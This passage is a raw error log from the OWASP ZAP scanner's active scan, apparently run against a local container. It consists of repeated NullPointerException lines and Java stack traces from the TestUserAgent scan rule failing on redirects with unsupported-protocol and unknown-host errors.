[ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13056448 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13056849 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13057056 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13057258 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13058664 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13058867 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13059067 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13059468 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13061273 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13061675 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13061875 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13062077 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13067507 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13067997 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13068110 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13069283 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13072698 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13073100 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13073100 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13078164 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - unsupported protocol: '172.17.0.2' java.lang.IllegalStateException: unsupported protocol: '172.17.0.2' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13078367 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13078367 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13078569 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13078569 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13078769 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13078771 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13078967 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - Host name may not be null java.lang.IllegalArgumentException: Host name may not be null at org.apache.commons.httpclient.HttpHost.(HttpHost.java:68) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13078970 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13079172 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13079173 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - http java.net.UnknownHostException: http at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13079175 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - http java.net.UnknownHostException: http at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13079177 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - http java.net.UnknownHostException: http at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13079180 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - http java.net.UnknownHostException: http at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13079182 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - http java.net.UnknownHostException: http at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13079184 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - http java.net.UnknownHostException: http at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13079186 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - http java.net.UnknownHostException: http at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13079369 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - unsupported protocol: 'httk' java.lang.IllegalStateException: unsupported protocol: 'httk' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13079372 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13079572 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13079572 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13080491 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13080689 [ZAP-ActiveScanner-0] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: '172.17.0.2' java.lang.IllegalStateException: unsupported protocol: '172.17.0.2' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13080689 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - host parameter is null java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13080692 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13080893 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13080893 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13081093 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13081093 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13081294 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13081298 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13081301 [ZAP-ActiveScanner-1] WARN 